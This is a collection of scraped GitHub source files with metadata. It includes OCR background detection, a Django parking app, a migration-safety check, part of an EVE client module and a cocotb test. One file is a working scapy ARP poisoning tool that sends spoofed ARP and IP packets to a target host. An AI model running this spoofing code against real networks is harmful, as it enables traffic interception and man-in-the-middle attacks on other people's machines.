= users\r\n\r\n def _send_to_user_types(self, notification, user_types):\r\n if not hasattr(user_types, '__iter__'):\r\n user_types = [user_types]\r\n for user_type in user_types:\r\n if user_type not in self._by_user_type:\r\n self._by_user_type[user_type] = []\r\n self._by_user_type[user_type].append(notification)\r\n\r\n notification._to_user_types = user_types\r\n\r\n def _send_to_user_roles(self, notification, user_role_masks):\r\n role_list = self._extract_role_list(user_role_masks)\r\n for role in role_list:\r\n if role not in self._by_user_role:\r\n self._by_user_role[role] = []\r\n self._by_user_role[role].append(notification)\r\n\r\n notification._to_user_roles = role_list\r\n\r\n @staticmethod\r\n def _extract_role_list(user_role_masks):\r\n role_list = []\r\n if not hasattr(user_role_masks, '__iter__'):\r\n user_role_masks = [user_role_masks]\r\n for role_mask in user_role_masks:\r\n role_list.extend(typeutils.split_bitmask(role_mask))\r\n\r\n return list(set(role_list))\r\n", "repo_name": 
"connoryang/dec-eve-serenity", "sub_path": "client/scriber/hermes/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 18788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 118, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 168, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 168, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 247, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 247, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 365, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 365, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 387, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 387, "usage_type": "attribute"}, {"api_name": "typeutils.split_bitmask", "line_number": 463, "usage_type": "call"}]} +{"seq_id": "31267186612", "text": "# Cluster detected characters to columns and create background images.\n\nimport argparse\nimport csv\nimport os\nimport os.path as path\nfrom sklearn.cluster import DBSCAN\nimport numpy as np\nfrom PIL import Image, ImageDraw\nfrom scipy.ndimage import measurements\nimport tqdm\n\n\ndef read_boxes(path_boxes):\n with open(path_boxes, \"r\") as fd:\n reader = csv.reader(\n fd, delimiter=\"\\t\", quoting=csv.QUOTE_NONE, quotechar=\"\"\n )\n boxes = []\n for bbox in reader:\n box = Box(bbox)\n boxes.append(box)\n return boxes\n\n\nclass Cluster:\n\n def __init__(self):\n self.boxes = []\n\n def append(self, box):\n self.boxes.append(box)\n\n def sort(self):\n self.boxes = sorted(self.boxes, key=lambda box: box.yCenter)\n\n def size(self):\n return len(self.boxes)\n\n def xMean(self):\n x = 0\n for box in self.boxes:\n x += box.xCenter\n x /= self.size()\n return x\n\n def __str__(self):\n str = \"Cluster \"\n if len(self.boxes) > 0:\n str += \"xCenter0={:.0f}, yCenter0={:.0f} \".format(self.boxes[0].xCenter, self.boxes[0].yCenter)\n str += \"({} boxes)\".format(self.size())\n return str\n\n\nclass Box:\n\n def __init__(self, bbox):\n self.className = bbox[0]\n self.xStart = int(bbox[1])\n self.yStart = int(bbox[2])\n self.xEnd = int(bbox[3])\n self.yEnd = int(bbox[4])\n self.xCenter = (self.xStart + self.xEnd) / 2\n self.yCenter = (self.yStart + self.yEnd) / 2\n self.width = self.xEnd - self.xStart\n self.height = self.yEnd - self.yStart\n self.area = self.width * self.height\n\n def union(self, other):\n uclassName = self.className\n uxStart = min(self.xStart, other.xStart)\n uyStart = min(self.yStart, other.yStart)\n uxEnd = max(self.xEnd, other.xEnd)\n uyEnd = max(self.yEnd, other.yEnd)\n return 
Box([uclassName, uxStart, uyStart, uxEnd, uyEnd])\n\n def __str__(self):\n return \"{}_{}_{}_{}_{}_area={}\".format(self.className, self.xStart, self.yStart, self.xEnd, self.yEnd, self.area)\n\n\ndef cluster_columns(boxes, median_box, max_center_deviation, eps, min_samples):\n centers = []\n for box in boxes:\n centers.append([box.xCenter, box.yCenter, median_box.width, median_box.height, max_center_deviation])\n\n def column_distance(box1, box2):\n inf = 100000\n xCenter1 = box1[0]\n xCenter2 = box2[0]\n yCenter1 = box1[1]\n yCenter2 = box2[1]\n column_width = box1[2]\n character_height = box1[3]\n max_center_deviation = box1[4]\n if abs(xCenter1 - xCenter2) / column_width > max_center_deviation:\n return inf\n return abs(yCenter1 - yCenter2) / character_height\n\n X = np.array(centers)\n clustering = DBSCAN(eps=eps, min_samples=min_samples, metric=column_distance).fit(X)\n\n clusters = {}\n boxes_column_ok = []\n outliers_column = []\n for box, label in zip(boxes, clustering.labels_):\n if label < 0:\n outliers_column.append(box)\n else:\n if not label in clusters:\n clusters[label] = Cluster()\n clusters[label].append(box)\n boxes_column_ok.append(box)\n\n columns = []\n for label in clusters:\n column = None\n for box in clusters[label].boxes:\n if column is None:\n column = box\n else:\n column = column.union(box)\n columns.append(column)\n\n max_chars_per_column = 0\n for label in clusters:\n numchars = clusters[label].size()\n if numchars > max_chars_per_column:\n max_chars_per_column = numchars\n\n return columns, boxes_column_ok, outliers_column, max_chars_per_column\n\n\ndef get_empty_patch(columns, text_area, source_img):\n beam_width = 5\n min_width = 10\n min_height = 20\n min_color = 128\n patch_candidates = []\n for i, column in enumerate(columns):\n\n # below column\n\n label = \"below_{}_{}\".format(i, 0)\n x1 = column.xStart\n y1 = column.yEnd\n x2 = column.xEnd\n y2 = text_area.yEnd\n patch_candidates.append(Box([label, x1, y1, x2, y2]))\n jmax = min(i + beam_width, len(columns))\n for j in range (i+1, jmax):\n column2 = columns[j]\n label = \"below_{}_{}\".format(i, j)\n y1 = max(y1, column2.yEnd)\n x2 = column2.xEnd\n box = Box([label, x1, y1, x2, y2])\n patch_candidates.append(box)\n\n # above column\n\n label = \"above_{}_{}\".format(i, 0)\n x1 = column.xStart\n y1 = text_area.yStart\n x2 = column.xEnd\n y2 = column.yStart\n patch_candidates.append(Box([label, x1, y1, x2, y2]))\n jmax = min(i + beam_width, len(columns))\n for j in range (i+1, jmax):\n column2 = columns[j]\n label = \"above_{}_{}\".format(i, j)\n y1 = min(y1, column2.yStart)\n x2 = column2.xEnd\n box = Box([label, x1, y1, x2, y2])\n patch_candidates.append(box)\n\n # between columns\n\n if i + 1 < len(columns):\n label = \"between_{}_{}\".format(i, i+1)\n column2 = columns[i+1]\n x1 = column.xEnd\n y1 = text_area.yStart\n x2 = column2.xStart\n y2 = text_area.yEnd\n patch_candidates.append(Box([label, x1, y1, x2, y2]))\n\n if len(patch_candidates) == 0:\n return None\n\n result = None\n result_value = None\n for cand in patch_candidates:\n size_ok = cand.width > min_width and cand.height > min_height\n if size_ok:\n region = source_img.crop((cand.xStart, cand.yStart, cand.xEnd, cand.yEnd))\n npregion = np.array(region.convert('L'))\n mean = measurements.mean(npregion)\n stdv = measurements.standard_deviation(npregion)\n val = stdv\n color_ok = mean > min_color\n if (result is None or val < result_value) and color_ok:\n result = cand\n result_value = val\n\n return result\n\n\ndef 
clear_text_area(source_img, text_area, empty_patch):\n patch = source_img.crop((empty_patch.xStart, empty_patch.yStart, empty_patch.xEnd, empty_patch.yEnd))\n stepx = text_area.width // empty_patch.width\n stepy = text_area.height // empty_patch.height\n for i in range(0, stepx + 1):\n for j in range(0, stepy + 1):\n x1 = text_area.xStart + (i * empty_patch.width)\n y1 = text_area.yStart + (j * empty_patch.height)\n if i == stepx:\n x1 = text_area.xEnd - empty_patch.width\n if j == stepy:\n y1 = text_area.yEnd - empty_patch.height\n x2 = x1 + empty_patch.width\n y2 = y1 + empty_patch.height\n source_img.paste(patch, (x1, y1, x2, y2))\n\n\ndef detect_background(options, file_image, file_boxes, file_background, file_chars, file_area, file_view):\n\n # parameters\n\n threshold_boxsize = options.threshold_boxsize # 0.3; width/height cannot deviate more than X from the median width/height\n threshold_x_deviation = options.threshold_x_deviation # 0.1; allowed x deviation (relative to median width) to form a column\n threshold_y_deviation = options.threshold_y_deviation # 2; allowed y deviation (relative to median height) to form a column\n threshold_min_samples = options.threshold_min_samples # 3; minimum characters to form a column\n threshold_min_boxes = options.threshold_min_boxes # 100; minimum boxes per page\n\n # find median box\n\n all_boxes = read_boxes(file_boxes)\n sorted_boxes = sorted(all_boxes, key=lambda box: box.width * box.height)\n median_box = None\n if len(all_boxes) > 0:\n median_box = sorted_boxes[int(len(sorted_boxes) / 2)]\n\n # remove boxes that are too small or too large\n\n boxes_size_ok = []\n outliers_size = []\n for box in all_boxes:\n diff_width = abs(box.width - median_box.width) / median_box.width\n diff_height = abs(box.height - median_box.height) / median_box.height\n if diff_width <= threshold_boxsize or diff_height <= threshold_boxsize:\n boxes_size_ok.append(box)\n else:\n outliers_size.append(box)\n\n # create columns\n\n columns = []\n boxes_column_ok = []\n outliers_column = []\n max_chars_per_column = 0\n if len(boxes_size_ok) > 0:\n columns, boxes_column_ok, outliers_column, max_chars_per_column = cluster_columns(boxes_size_ok, median_box, threshold_x_deviation, threshold_y_deviation, threshold_min_samples)\n if len(columns) > 0:\n columns, _, _, _ = cluster_columns(columns, median_box, 3 * threshold_x_deviation, 100, 1)\n columns = sorted(columns, key=lambda box: box.xCenter)\n\n # create text area\n\n text_area = None\n total_chars = len(boxes_column_ok)\n if total_chars > threshold_min_boxes:\n for column in columns:\n if text_area is None:\n text_area = column\n else:\n text_area = text_area.union(column)\n\n # create background\n\n background_image = Image.open(file_image).convert(\"RGBA\")\n width, height = background_image.size\n empty_patch = None\n if len(columns) > 0 and text_area is not None:\n empty_patch = get_empty_patch(columns, text_area, background_image)\n if empty_patch is not None:\n clear_text_area(background_image, text_area, empty_patch)\n\n factor = 1\n max_size = max(width, height)\n if max_size > 1024:\n factor = 1024 / max_size\n background_image.thumbnail((1024, 1024))\n\n background_image.save(file_background, \"PNG\")\n with open(file_chars, \"w\") as fd_tsv:\n writer_tsv = csv.writer(fd_tsv, delimiter=\"\\t\")\n name = file_background.split(\"/\")[-1]\n writer_tsv.writerow([name, len(columns), max_chars_per_column, len(all_boxes), len(boxes_size_ok), len(boxes_column_ok), median_box.width, median_box.height, factor])\n with 
open(file_area, \"w\") as fd_tsv:\n writer_tsv = csv.writer(fd_tsv, delimiter=\"\\t\")\n writer_tsv.writerow([int(text_area.xStart * factor), int(text_area.yStart * factor), int(text_area.xEnd * factor), int(text_area.yEnd * factor)])\n\n # create view\n\n view_image = Image.open(file_image).convert(\"RGBA\")\n draw = ImageDraw.Draw(view_image)\n for box in outliers_size:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=3, fill=None, outline=\"red\")\n for box in outliers_column:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=3, fill=None, outline=\"blue\")\n for box in boxes_column_ok:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=3, fill=None, outline=\"green\")\n for box in columns:\n draw.rectangle(((box.xStart, box.yStart), (box.xEnd, box.yEnd)), width=4, fill=None, outline=\"yellow\")\n if text_area is not None:\n draw.rectangle(((text_area.xStart, text_area.yStart), (text_area.xEnd, text_area.yEnd)), width=4, fill=None, outline=\"yellow\")\n if empty_patch is not None:\n draw.rectangle(((empty_patch.xStart, empty_patch.yStart), (empty_patch.xEnd, empty_patch.yEnd)), width=8, fill=None, outline=\"cyan\")\n view_image.save(file_view, \"PNG\")\n\n\ndef build_parser() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser()\n\n # required\n\n parser.add_argument(\n \"--experiment\",\n dest=\"exp_dir\",\n required=True,\n type=str,\n help=\"Experiment directory\",\n )\n parser.add_argument(\n \"--image-type\",\n dest=\"img_type\",\n required=True,\n type=str,\n help=\"Image type (jpg, png, ...)\",\n )\n\n # optional\n\n parser.add_argument(\n \"--boxsize\",\n dest=\"threshold_boxsize\",\n required=False,\n type=float,\n default=0.3,\n help=\"Maximum deviation from the median box size\",\n )\n parser.add_argument(\n \"--x-deviation\",\n dest=\"threshold_x_deviation\",\n required=False,\n type=float,\n default=0.1,\n help=\"Maximum horizontal deviation in text column (relative to median box width)\",\n )\n parser.add_argument(\n \"--y-deviation\",\n dest=\"threshold_y_deviation\",\n required=False,\n type=float,\n default=2.0,\n help=\"Maximum vertical gap in text column (relative to median box height)\",\n )\n parser.add_argument(\n \"--min-samples\",\n dest=\"threshold_min_samples\",\n required=False,\n type=int,\n default=3,\n help=\"Minimum number of characters in text column\",\n )\n parser.add_argument(\n \"--min-boxes\",\n dest=\"threshold_min_boxes\",\n required=False,\n type=int,\n default=100,\n help=\"Minimum number of selected boxes on page\",\n )\n\n return parser\n\n\nif __name__ == \"__main__\":\n options = build_parser().parse_args()\n exp_dir = options.exp_dir\n img_type_lower = options.img_type.lower()\n img_type_upper = options.img_type.upper()\n\n dir_detected = path.join(exp_dir, \"detected\")\n dir_background = path.join(exp_dir, \"background_images\")\n dir_background_chars = path.join(exp_dir, \"background_chars\")\n dir_background_area = path.join(exp_dir, \"background_areas\")\n dir_background_view = path.join(exp_dir, \"background_view\")\n if not path.exists(dir_background):\n os.makedirs(dir_background)\n if not path.exists(dir_background_chars):\n os.makedirs(dir_background_chars)\n if not path.exists(dir_background_area):\n os.makedirs(dir_background_area)\n if not path.exists(dir_background_view):\n os.makedirs(dir_background_view)\n\n print(\"Detect background ..\")\n files = sorted(os.listdir(dir_detected))\n log_page = tqdm.tqdm(total=len(files), desc='Create background', 
position=1)\n for filename in files:\n if filename.endswith(\".{}\".format(img_type_lower)) or filename.endswith(\".{}\".format(img_type_upper)):\n file_image = os.path.join(dir_detected, filename)\n file_boxes = os.path.join(dir_detected, \"{}.tsv\".format(filename.split(\".\")[0]))\n file_background = os.path.join(dir_background, \"{}.png\".format(filename.split(\".\")[0]))\n file_chars = os.path.join(dir_background_chars, \"{}.tsv\".format(filename.split(\".\")[0]))\n file_area = os.path.join(dir_background_area, \"{}.tsv\".format(filename.split(\".\")[0]))\n file_view = os.path.join(dir_background_view, \"{}.png\".format(filename.split(\".\")[0]))\n detect_background(options, file_image, file_boxes, file_background, file_chars, file_area, file_view)\n log_page.update(1)\n\n file_colchars = os.path.join(dir_background, \"background_col_char.tsv\")\n colchars = []\n for filename in sorted(os.listdir(dir_background_chars)):\n if filename.endswith(\".tsv\"):\n file_tsv = os.path.join(dir_background_chars, filename)\n with open(file_tsv, \"r\") as fd:\n reader = csv.reader(fd, delimiter=\"\\t\", quoting=csv.QUOTE_NONE, quotechar=\"\")\n for line in reader:\n colchars.append([line[0], line[1], line[2]])\n with open(file_colchars, 'w') as fd_tsv:\n writer_tsv = csv.writer(fd_tsv, delimiter=\"\\t\")\n for line in colchars:\n writer_tsv.writerow(line)\n\n", "repo_name": "asciusb/annotationfree", "sub_path": "selftrain/background.py", "file_name": "background.py", "file_ext": "py", "file_size_in_byte": 15540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.cluster.DBSCAN", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 195, "usage_type": "call"}, {"api_name": "scipy.ndimage.measurements.mean", "line_number": 196, "usage_type": "call"}, {"api_name": "scipy.ndimage.measurements", "line_number": 196, "usage_type": "name"}, {"api_name": "scipy.ndimage.measurements.standard_deviation", "line_number": 197, "usage_type": "call"}, {"api_name": "scipy.ndimage.measurements", "line_number": 197, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 279, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 279, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 295, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 299, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 304, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 304, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 305, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 305, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 322, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 321, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 393, "usage_type": "call"}, {"api_name": "os.path", "line_number": 393, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path", "line_number": 394, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 395, "usage_type": "call"}, {"api_name": "os.path", "line_number": 395, "usage_type": "name"}, 
{"api_name": "os.path.join", "line_number": 396, "usage_type": "call"}, {"api_name": "os.path", "line_number": 396, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 397, "usage_type": "call"}, {"api_name": "os.path", "line_number": 397, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 398, "usage_type": "call"}, {"api_name": "os.path", "line_number": 398, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 399, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 400, "usage_type": "call"}, {"api_name": "os.path", "line_number": 400, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 402, "usage_type": "call"}, {"api_name": "os.path", "line_number": 402, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 403, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 404, "usage_type": "call"}, {"api_name": "os.path", "line_number": 404, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 405, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 408, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path", "line_number": 412, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 413, "usage_type": "call"}, {"api_name": "os.path", "line_number": 413, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 414, "usage_type": "call"}, {"api_name": "os.path", "line_number": 414, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 415, "usage_type": "call"}, {"api_name": "os.path", "line_number": 415, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 416, "usage_type": "call"}, {"api_name": "os.path", "line_number": 416, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 417, "usage_type": "call"}, {"api_name": "os.path", "line_number": 417, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 421, "usage_type": "call"}, {"api_name": "os.path", "line_number": 421, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 423, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path", "line_number": 425, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 427, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 427, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 431, "usage_type": "call"}]} +{"seq_id": "35554514079", "text": "#!/usr/bin/python3\n#EmreOvunc\n#info@emreovunc.com\n\nfrom argparse import ArgumentParser\nfrom scapy.all import *\nimport random\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--target-ip', '-ti', help='target IP address')\n parser.add_argument('--target-mac', '-tm', help='target MAC address')\n parser.add_argument('--fake-ip', '-fi', help='fake IP address -spoofed-')\n parser.add_argument('--fake-mac', '-fm', help='fake MAC address -spoofed-')\n parser.add_argument('--count', '-c', help='number of packets')\n parser.add_argument('--version','-v', action='version', version='ARP_Poisoning_CMD v1.0.1')\n parser.epilog = \"Usage: python3 arp_poisoning_cmd.py -ti 10.20.30.40 -tm 11:22:33:aa:bb:cc -fi 10.20.30.41 -fm aa:bb:cc:11:22:33 -c 1\"\n\n args = parser.parse_args()\n\n if 
args.target_ip is not None:\n if args.target_mac is not None:\n if args.fake_ip is not None:\n if args.fake_mac is not None:\n ARP_Packet = ARP()\n ICMP_Packet = IP()\n\n DestinationIP(ARP_Packet, ICMP_Packet, args.target_ip)\n DestinationHW(ARP_Packet, args.target_mac)\n SourceIP(ARP_Packet, ICMP_Packet, args.fake_ip)\n SourceHW(ARP_Packet, args.fake_mac)\n\n if args.count is None:\n print('[!]You did not use --counter/-c parameter, so 1 packet will be sent..')\n send(ICMP_Packet)\n send(ARP_Packet)\n\n else:\n for pct in range(int(args.count)):\n send(ICMP_Packet)\n send(ARP_Packet)\n\n else:\n print('[-]Please, use --fake-mac or -fm to set a fake MAC address!')\n print('[!]Example: -fm aa:bb:cc:11:22:33')\n print('[?] -h for help')\n exit()\n else:\n print('[-]Please, use --fake-ip or -fi to set a fake IP address!')\n print('[!]Example: -fi 10.20.30.40')\n print('[?] -h for help')\n exit()\n else:\n print('[-]Please, use --target-mac or -tm to set a target MAC address!')\n print('[!]Example: -tm aa:bb:cc:11:22:33')\n print('[?] -h for help')\n exit()\n else:\n print('''usage: arp_poisoning_cmd.py [-h] [--target-ip TARGET_IP]\n [--target-mac TARGET_MAC] [--fake-ip FAKE_IP]\n [--fake-mac FAKE_MAC] [--count COUNT] [--version]\noptional arguments:\n -h, --help show this help message and exit\n --target-ip TARGET_IP, -ti TARGET_IP\n target IP address\n --target-mac TARGET_MAC, -tm TARGET_MAC\n target MAC address\n --fake-ip FAKE_IP, -fi FAKE_IP\n fake IP address -spoofed-\n --fake-mac FAKE_MAC, -fm FAKE_MAC\n fake MAC address -spoofed-\n --count COUNT, -c COUNT\n number of packets\n --version, -v show program's version number and exit\n\nUsage: python3 arp_poisoning_cmd.py -ti 10.20.30.40 -tm 11:22:33:aa:bb:cc -fi\n10.20.30.41 -fm aa:bb:cc:11:22:33 -c 1''')\n exit()\n\n\ndef SourceIP(ARP_Packet, ICMP_Packet, fakeip):\n ARP_Packet.psrc = fakeip\n ICMP_Packet.src = fakeip\n\n\ndef DestinationIP(ARP_Packet, ICMP_Packet, target):\n ARP_Packet.pdst = target\n ICMP_Packet.dst = target\n\n\ndef SourceHW(ARP_Packet, fakemac):\n ARP_Packet.hwsrc = fakemac\n\n\ndef DestinationHW(ARP_Packet, targetmac):\n ARP_Packet.hwdst = targetmac\n\n\ndef randomMAC():\n mac = [random.randint(0x00, 0xff), random.randint(0x00, 0xff), random.randint(0x00, 0xff),\n random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff)]\n return ':'.join(map(lambda x: \"%02x\" % x, mac))\n\n\ndef randomIP():\n ip = \".\".join(map(str, (random.randint(0, 255) for _ in range(4))))\n return ip\n\nmain()\n", "repo_name": "EmreOvunc/ARP-Poisoning-Tool", "sub_path": "arp_poisoning_cmd.py", "file_name": "arp_poisoning_cmd.py", "file_ext": "py", "file_size_in_byte": 4045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 39, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 101, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "14774976924", "text": "from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth import views as auth_views\nfrom django.views import generic\nfrom .forms import *\nfrom django.contrib.auth import login\nfrom django.contrib import messages\nfrom .models import *\nimport datetime\n# Create your views here.\n\nclass LoginView(auth_views.LoginView):\n template_name = 
'user_login.html'\n\nclass UserSignUpView(generic.TemplateView):\n template_name = \"signup.html\"\n\n def get(self,request):\n form = UserRegistrationForm()\n return render(request, self.template_name, {\"form\":form})\n def post(self,request):\n form = UserRegistrationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(\"customer:home\")\n form = UserRegistrationForm\n return render(request, self.template_name, {\"form\": form})\n\n\nclass HomePageView(generic.TemplateView):\n template_name = \"home.html\"\n\n\n def post(self,request):\n if 'entry-btn' in request.POST:\n\n vehicle_number = request.POST.get('reg-num')\n data = CustomerData.objects.create(customer=self.request.user, vehicle_number=vehicle_number,entry_time=datetime.datetime.now())\n return render(request, 'code.html',{\"code\": data.code})\n else:\n code = request.POST.get('code')\n try:\n data = CustomerData.objects.get(code=code)\n data.exit_time = datetime.datetime.now()\n data.save()\n return render(request, 'user_data.html', {\"data\": data})\n except:\n error_msg = \"Invalid Code\"\n return render(request,self.template_name,{\"error\":error_msg})\n\n\nclass LogoutView(auth_views.LogoutView):\n template_name = 'user_login.html'\n", "repo_name": "anjanavalsaraj/parking_lot_management", "sub_path": "customer/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.views.LoginView", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 45, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 53, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "32893638711", "text": "import re\nimport sys\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand, CommandError\n\n\nclass Command(BaseCommand):\n help = \"Automated test to make sure there are no non-null, dropping, renaming, or multiple migrations\"\n\n def handle(self, *args, **options):\n def 
run_and_check_migration(variable):\n try:\n results = re.findall(r\"([a-z]+)\\/migrations\\/([a-zA-Z_0-9]+)\\.py\", variable)[0]\n sql = call_command(\"sqlmigrate\", results[0], results[1])\n if (\n (\"NOT NULL\" in sql or \"DEFAULT\" in sql)\n and \"Create model\" not in sql\n and \"-- not-null-ignore\" not in sql\n ):\n print(\n f\"\\n\\n\\033[91mFound a non-null field added to an existing model. This will lock up the table while migrating. Please add 'null=True, blank=True' to the field\",\n )\n sys.exit(1)\n\n if \"RENAME\" in sql:\n print(\n f\"\\n\\n\\033[91mFound a rename command. This will lock up the table while migrating. Please create a new column and provide alternative method for swapping columns\",\n )\n sys.exit(1)\n\n if \"DROP COLUMN\" in sql:\n print(\n f\"\\n\\n\\033[91mFound a drop command. This could lead to unsafe states for the app. Please avoid dropping columns\",\n )\n sys.exit(1)\n except (IndexError, CommandError):\n pass\n\n migrations = sys.stdin.readlines()\n if len(migrations) > 1:\n print(\n f\"\\n\\n\\033[91mFound multiple migrations. Please scope PRs to one migration to promote easy debugging and revertability\",\n )\n sys.exit(1)\n\n for data in migrations:\n run_and_check_migration(data)\n", "repo_name": "lokeshpahal/posthog1", "sub_path": "posthog/management/commands/test_migrations_are_safe.py", "file_name": "test_migrations_are_safe.py", "file_ext": "py", "file_size_in_byte": 1998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 8, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 14, "usage_type": "call"}, {"api_name": "django.core.management.call_command", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 36, "usage_type": "call"}, {"api_name": "django.core.management.base.CommandError", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.stdin.readlines", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "37034675822", "text": "import cocotb\nfrom cocotb.triggers import Timer\n\nfrom cocotblib.misc import randSignal, assertEquals, truncUInt, sint\n\n\nclass Ref:\n def __init__(self,dut):\n self.io_outSFix_0 = truncUInt(sint(dut.io_inSFix_0) + ((sint(dut.io_inSFix_1) << 2)), dut.io_outSFix_0)\n self.io_outSFix_1 = truncUInt((sint(dut.io_inSFix_0) * sint(dut.io_inSFix_1)) >> 5, dut.io_outSFix_1)\n 